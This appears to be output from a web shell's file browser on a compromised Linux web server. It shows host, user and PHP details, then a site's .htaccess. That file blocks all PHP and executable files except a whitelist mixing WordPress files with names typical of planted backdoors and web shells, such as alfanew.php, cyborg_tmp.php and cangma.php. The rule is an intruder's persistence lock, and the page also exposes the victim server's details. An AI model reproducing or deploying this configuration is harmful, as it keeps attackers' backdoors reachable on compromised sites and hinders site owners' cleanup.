HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: cssnetorguk (1024)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: //old_home_backup/mh-linux.co.uk/public_html/.htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|php8|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|new.php|wp-login.php|wp-term.php|wp-ver.php|cachef.php|uninstall.php|alfanew.php|plugin-editor.php|users.php|checkbox.php|upgrade.php|crack_self_restore.php|checkbex.php|down.php|down2.php|downzip.php|enfile.php|gh.php|pinuseren.php|version.php|head.php|heada.php|wp-head.php|wp-site.php|wp-info.php|wp-admin.php|wp-config-sample.php|jk.php|cangma.php|cawpf.php|nowp.php|nowpf.php|cyborg_tmp.php|k.php|blogcy.php|wp-blog-header.php|updates.php|wccy.php|usercy.php|readme.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>